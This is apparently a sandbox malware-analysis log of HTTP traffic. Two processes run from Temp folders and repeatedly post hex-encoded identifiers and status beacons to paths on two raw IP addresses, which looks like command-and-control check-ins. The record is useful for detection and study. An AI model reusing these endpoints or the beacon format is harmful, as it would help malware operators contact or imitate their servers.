                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:34.521420002 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:34.776989937 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      349192.168.2.550192193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:34.788438082 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.031517982 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      350192.168.2.550193193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.141568899 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.392831087 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      351192.168.2.550194193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.386176109 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.629666090 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      352192.168.2.550195193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.715760946 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.972822905 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      353192.168.2.550196193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:35.886825085 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:36.140080929 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      354192.168.2.550197193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:36.338838100 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:36.586311102 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      355192.168.2.550198193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:36.515037060 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:36.763463020 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      356192.168.2.550199193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:36.840464115 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.094368935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:36 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      357192.168.2.550200193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.022990942 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.276845932 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      358192.168.2.550201193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.459860086 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.704828978 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      359192.168.2.550202193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.633476973 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.878118992 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:37 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      360192.168.2.550203193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:37.959350109 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.209850073 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      361192.168.2.550204193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.140732050 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.395939112 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      362192.168.2.550205193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.568617105 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.812623024 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      363192.168.2.550207193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:38.772507906 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:39.020409107 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      364192.168.2.550208193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
